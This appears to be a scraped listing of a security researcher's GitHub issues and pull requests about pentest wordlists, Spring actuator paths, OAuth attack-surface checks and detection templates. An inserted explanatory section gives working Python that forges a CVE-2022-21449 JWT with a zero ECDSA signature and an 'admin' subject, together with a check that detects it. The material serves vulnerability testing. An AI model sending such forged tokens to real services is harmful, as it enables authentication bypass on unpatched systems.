Dominique RIGHETTO

Results: 40 issues of Dominique RIGHETTO

- [ ] [Vulnerability scan](https://github.com/anchore/grype).
- [ ] [SBOM descriptor generation](https://github.com/anchore/syft).
- [ ] [Reduce the image global size](https://dockersl.im/).

💡 Source: https://twitter.com/abhaybhargav/status/1527334550057017366

Label: enhancement

# Target

- [identify-attack-surface-oauth-oidc-sts.py](https://github.com/righettod/toolbox-pentest-web/blob/master/scripts/identify-attack-surface-oauth-oidc-sts.py)

# List of features

- [x] Add detection of the support for the **Hybrid flow**.
- [x] Add detection of the support of the **claims** parameter...

Label: enhancement

Hi, This PR uses this [documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/application-properties.html#application-properties.actuator.management.server.base-path) to add the prefix `management/` to the endpoints list from this [documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints):

![image](https://user-images.githubusercontent.com/1573775/188488919-716fa303-1a66-4c87-a4ae-3360a85e3048.png)

![image](https://user-images.githubusercontent.com/1573775/188489001-5ac4fcb3-3faa-4ae5-95fb-73a0e9db783a.png)

Command used to extract endpoints:

```shell
curl -sk https://docs.spring.io/spring-boot/docs/2.1.7.RELEASE/reference/html/production-ready-endpoints.html | grep...
```

Hi, This PR performed the following operations on file **[AdobeCQ-AEM.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/AdobeCQ-AEM.txt)**:

- Remove leading slash for each line.
- Add missing entries based on the sources below.
- Sort entries alphabetically....

> **Note**: After a very useful review by @ItsIgnacioPortal, I changed the approach by creating a dedicated script to perform the check and raise the warning. The GitHub workflow...

Hi, This PR proposes an implementation to test exposure to [CVE-2022-21449](https://nvd.nist.gov/vuln/detail/CVE-2022-21449). It refers to issue #65. I tried following the current coding rules as much as possible and tried...

Hi, After reading this [blog post](https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/) about [CVE-2022-21449](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449), I was wondering if it could be interesting to add a test case with a JWT token for which the signature...
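The two entries above (the issue and the PR for CVE-2022-21449) are about a "psychic signature": an ECDSA-signed JWT whose signature has r = s = 0, which an affected Java verifier accepted for any payload. The following is an added example, not code from the issue, the PR or the tool it targets. It builds such a token with the Python standard library only (the header and payload are constructed here) and shows the range check a correct verifier must apply before any curve arithmetic, 1 ≤ r, s ≤ n-1, which is exactly what the vulnerable implementation skipped. Function and constant names are this example's own.

```python
import base64
import json

# Group orders n for the curves behind the JWS ES* algorithms (SEC 2 / FIPS 186-4).
CURVE_ORDER = {
    "ES256": 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551,
    "ES384": 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC7634D81F4372DDF581A0DB248B0A77AECEC196ACCC52973,
    "ES512": 0x01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFA51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409,
}


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as required by JWS compact serialization."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def build_es_jwt(payload: dict, signature: bytes, alg: str = "ES256") -> str:
    """Assemble header.payload.signature with an arbitrary (here: forged) signature.

    JWS ES* signatures are the raw concatenation r || s, each left-padded to the
    field size (32 bytes each for ES256), so 64 zero bytes encode r = s = 0.
    """
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    return signing_input + "." + b64url_encode(signature)


def build_psychic_jwt(payload: dict) -> str:
    """The CVE-2022-21449 test vector: an ES256 token signed with r = s = 0."""
    return build_es_jwt(payload, bytes(64), alg="ES256")


def split_rs(signature: bytes) -> tuple:
    """Split a raw JWS signature into its (r, s) integers."""
    half = len(signature) // 2
    return int.from_bytes(signature[:half], "big"), int.from_bytes(signature[half:], "big")


def rs_in_range(r: int, s: int, order: int) -> bool:
    """The check a verifier must do first: both values strictly between 0 and n.

    r = 0, s = 0, or r = n, s = n (which reduce to 0 mod n) all make the ECDSA
    verification equation trivially true on an implementation that skips this.
    """
    return 1 <= r < order and 1 <= s < order


def is_psychic_signature(token: str) -> bool:
    """True when an ES* token carries an out-of-range (r, s) that must be rejected."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    header = json.loads(b64url_decode(parts[0]))
    order = CURVE_ORDER.get(header.get("alg", ""))
    if order is None:
        return False  # not an ECDSA token; the check does not apply
    r, s = split_rs(b64url_decode(parts[2]))
    return not rs_in_range(r, s, order)


if __name__ == "__main__":
    token = build_psychic_jwt({"sub": "admin", "iat": 1650000000})
    print(token)
    print("must be rejected:", is_psychic_signature(token))
```

Sending the token produced by `build_psychic_jwt` to a verifier and observing whether it is accepted is the exposure test; a patched verifier rejects it before touching the public key, and `is_psychic_signature` shows the condition it checks. The same token with `r = n` instead of `r = 0` is caught by the same range test.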

Hi, First, thank you very much for this amazing tool 🥇 This PR adds a Dockerfile in order to either:

* Quickly run the application via Docker.
* Provide a...

Hello, First, thank you very much for this amazing project 🥇 This PR updates the link referencing the OWASP Secure Headers Project to the [right one](https://owasp.org/www-project-secure-headers/) in the different flavor...

### Template / PR Information

Hi, This PR adds a template to detect an instance of the [eArcu](https://www.earcu.com/products) software.

- References: https://www.earcu.com/products

### Template Validation

I've validated this template locally?...
